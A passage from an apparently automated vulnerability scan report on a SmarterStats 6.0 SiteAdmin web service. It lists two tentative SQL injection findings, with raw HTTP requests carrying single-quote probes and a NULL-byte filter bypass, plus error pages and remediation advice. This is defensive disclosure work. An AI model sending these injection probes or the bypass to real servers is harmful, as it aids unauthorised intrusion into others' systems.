&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;Directory&gt;<font class=value>string</font>&lt;/Directory&gt;
&lt;ProxyType&gt;<font class=value>string</font>&lt;/ProxyType&gt;
&lt;ProxyAddress&gt;<font class=value>string</font>&lt;/ProxyAddress&gt;
&lt;ProxyPort&gt;<font class=value>int</font>&lt;/ProxyPort&gt;
&lt;ProxyUserName&gt;<font class=value>string</font>&lt;/ProxyUserName&gt;
&lt;ProxyPassword&gt;<font class=value>string</font>&lt;/ProxyPassword&gt;
&lt;Server&gt;<font class=value>string</font>&lt;/Server&gt;
&lt;Port&gt;<font class=value>int</font>&lt;/Port&gt;
&lt;Username&gt;<font class=value>string</font>&lt;/Username&gt;
&lt;Password&gt;<font class=value>string</font>&lt;/Password&gt;
&lt;IntervalHours&gt;<font class=value>int</font>&lt;/IntervalHours&gt;
&lt;/AddSiteWithFTP2&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;AddSiteWithFTP2Response xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;AddSiteWithFTP2Result&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/AddSiteWithFTP2Result&gt;
&lt;/AddSiteWithFTP2Response&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/AddSiteWithFTP2?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font class=key>IntervalHours</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/AddSiteWithFTP2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>soUserName</font>=<font class=value>string</font>&amp;<font class=key>soPassword</font>=<font class=value>string</font>&amp;<font class=key>soFirstName</font>=<font class=value>string</font>&amp;<font class=key>soLastName</font>=<font class=value>string</font>&amp;<font class=key>ServerID</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font>&amp;<font class=key>DomainName</font>=<font class=value>string</font>&amp;<font class=key>LogFormat</font>=<font class=value>string</font>&amp;<font class=key>LogWildcard</font>=<font class=value>string</font>&amp;<font class=key>LogDaysBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogDirectory</font>=<font class=value>string</font>&amp;<font class=key>SmarterLogMonthsBeforeDelete</font>=<font class=value>string</font>&amp;<font class=key>ExportPath</font>=<font class=value>string</font>&amp;<font class=key>ExportPathURL</font>=<font class=value>string</font>&amp;<font class=key>TimeZoneIndex</font>=<font class=value>string</font>&amp;<font class=key>Directory</font>=<font class=value>string</font>&amp;<font class=key>ProxyType</font>=<font class=value>string</font>&amp;<font class=key>ProxyAddress</font>=<font class=value>string</font>&amp;<font class=key>ProxyPort</font>=<font class=value>string</font>&amp;<font class=key>ProxyUserName</font>=<font class=value>string</font>&amp;<font class=key>ProxyPassword</font>=<font class=value>string</font>&amp;<font class=key>Server</font>=<font class=value>string</font>&amp;<font class=key>Port</font>=<font class=value>string</font>&amp;<font class=key>Username</font>=<font class=value>string</font>&amp;<font class=key>Password</font>=<font class=value>string</font>&amp;<font class=key>IntervalHours</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;GenericResult xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;/GenericResult&gt;</pre>
</span>

</span>









</body>
</html>

2.17. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [loginsettings cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The loginsettings cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the loginsettings cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /Services/SiteAdmin.asmx?op=GetSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=';

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:37:07 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetSite HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings='';

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:37:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 14402
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>





<span>
<p class="intro">Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.</p>
<h2>GetSite</h2>
<p class="intro">Returns one site listed in the MRS.</p>

<h3>Test</h3>

To test the operation using the HTTP POST protocol, click the 'Invoke' button.



<form target="_blank" action='http://localhost:9999/Services/SiteAdmin.asmx/GetSite' method="POST">

<table cellspacing="0" cellpadding="4" frame="box" bordercolor="#dcdcdc" rules="none" style="border-collapse: collapse;">
<tr>
   <td class="frmHeader" background="#dcdcdc" style="border-right: 2px solid white;">Parameter</td>
   <td class="frmHeader" background="#dcdcdc">Value</td>
</tr>


<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authUserName:</td>
<td><input class="frmInput" type="text" size="50" name="authUserName"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">authPassword:</td>
<td><input class="frmInput" type="text" size="50" name="authPassword"></td>
</tr>

<tr>
<td class="frmText" style="color: #000000; font-weight: normal;">SiteID:</td>
<td><input class="frmInput" type="text" size="50" name="SiteID"></td>
</tr>

<tr>
<td></td>
<td align="right"> <input type="submit" value="Invoke" class="button"></td>
</tr>
</table>


</form>
<span>
<h3>SOAP 1.1</h3>
<p>The following is a sample SOAP 1.1 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>
SOAPAction: "http://www.smartertools.com/smarterstats/SiteAdmin.asmx/GetSite"

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSite&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"&gt;
&lt;soap:Body&gt;
&lt;GetSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteResult&gt;
&lt;/GetSiteResponse&gt;
&lt;/soap:Body&gt;
&lt;/soap:Envelope&gt;</pre>
</span>

<span>
<h3>SOAP 1.2</h3>
<p>The following is a sample SOAP 1.2 request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx HTTP/1.1
Host: localhost
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSite xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;authUserName&gt;<font class=value>string</font>&lt;/authUserName&gt;
&lt;authPassword&gt;<font class=value>string</font>&lt;/authPassword&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;/GetSite&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>

<pre>HTTP/1.1 200 OK
Content-Type: application/soap+xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;
&lt;soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope"&gt;
&lt;soap12:Body&gt;
&lt;GetSiteResponse xmlns="http://www.smartertools.com/smarterstats/SiteAdmin.asmx"&gt;
&lt;GetSiteResult&gt;
&lt;Result&gt;<font class=value>boolean</font>&lt;/Result&gt;
&lt;ResultCode&gt;<font class=value>int</font>&lt;/ResultCode&gt;
&lt;Message&gt;<font class=value>string</font>&lt;/Message&gt;
&lt;Site&gt;
&lt;ServerID&gt;<font class=value>int</font>&lt;/ServerID&gt;
&lt;SiteID&gt;<font class=value>int</font>&lt;/SiteID&gt;
&lt;DomainName&gt;<font class=value>string</font>&lt;/DomainName&gt;
&lt;LogDirectory&gt;<font class=value>string</font>&lt;/LogDirectory&gt;
&lt;LogFormat&gt;<font class=value>string</font>&lt;/LogFormat&gt;
&lt;LogWildcard&gt;<font class=value>string</font>&lt;/LogWildcard&gt;
&lt;LogDaysBeforeDelete&gt;<font class=value>int</font>&lt;/LogDaysBeforeDelete&gt;
&lt;SmarterLogDirectory&gt;<font class=value>string</font>&lt;/SmarterLogDirectory&gt;
&lt;SmarterLogMonthsBeforeDelete&gt;<font class=value>int</font>&lt;/SmarterLogMonthsBeforeDelete&gt;
&lt;ExportPath&gt;<font class=value>string</font>&lt;/ExportPath&gt;
&lt;ExportPathURL&gt;<font class=value>string</font>&lt;/ExportPathURL&gt;
&lt;TimeZoneIndex&gt;<font class=value>int</font>&lt;/TimeZoneIndex&gt;
&lt;SiteStatus&gt;<font class=value>string</font>&lt;/SiteStatus&gt;
&lt;ftp_Enabled&gt;<font class=value>boolean</font>&lt;/ftp_Enabled&gt;
&lt;ftp_Server&gt;<font class=value>string</font>&lt;/ftp_Server&gt;
&lt;ftp_port&gt;<font class=value>int</font>&lt;/ftp_port&gt;
&lt;ftp_Username&gt;<font class=value>string</font>&lt;/ftp_Username&gt;
&lt;ftp_Password&gt;<font class=value>string</font>&lt;/ftp_Password&gt;
&lt;ftp_Interval&gt;<font class=value>int</font>&lt;/ftp_Interval&gt;
&lt;ftp_Directory&gt;<font class=value>string</font>&lt;/ftp_Directory&gt;
&lt;ftp_ProxyType&gt;<font class=value>string</font>&lt;/ftp_ProxyType&gt;
&lt;ftp_ProxyAddress&gt;<font class=value>string</font>&lt;/ftp_ProxyAddress&gt;
&lt;ftp_ProxyPort&gt;<font class=value>int</font>&lt;/ftp_ProxyPort&gt;
&lt;ftp_ProxyUsername&gt;<font class=value>string</font>&lt;/ftp_ProxyUsername&gt;
&lt;ftp_ProxyPassword&gt;<font class=value>string</font>&lt;/ftp_ProxyPassword&gt;
&lt;/Site&gt;
&lt;/GetSiteResult&gt;
&lt;/GetSiteResponse&gt;
&lt;/soap12:Body&gt;
&lt;/soap12:Envelope&gt;</pre>
</span>

<span>
<h3>HTTP GET</h3>
<p>The following is a sample HTTP GET request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>GET /Services/SiteAdmin.asmx/GetSite?<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font> HTTP/1.1
Host: localhost
</pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;</pre>
</span>

<span>
<h3>HTTP POST</h3>
<p>The following is a sample HTTP POST request and response. The <font class=value>placeholders</font> shown need to be replaced with actual values.</p>

<pre>POST /Services/SiteAdmin.asmx/GetSite HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: <font class=value>length</font>

<font class=key>authUserName</font>=<font class=value>string</font>&amp;<font class=key>authPassword</font>=<font class=value>string</font>&amp;<font class=key>SiteID</font>=<font class=value>string</font></pre>

<pre>HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: <font class=value>length</font>

&lt;?xml version="1.0" encoding="utf-8"?&gt;</pre>
</span>

</span>









</body>
</html>

2.18. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The op parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the op parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSite3%00' HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 02:33:16 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

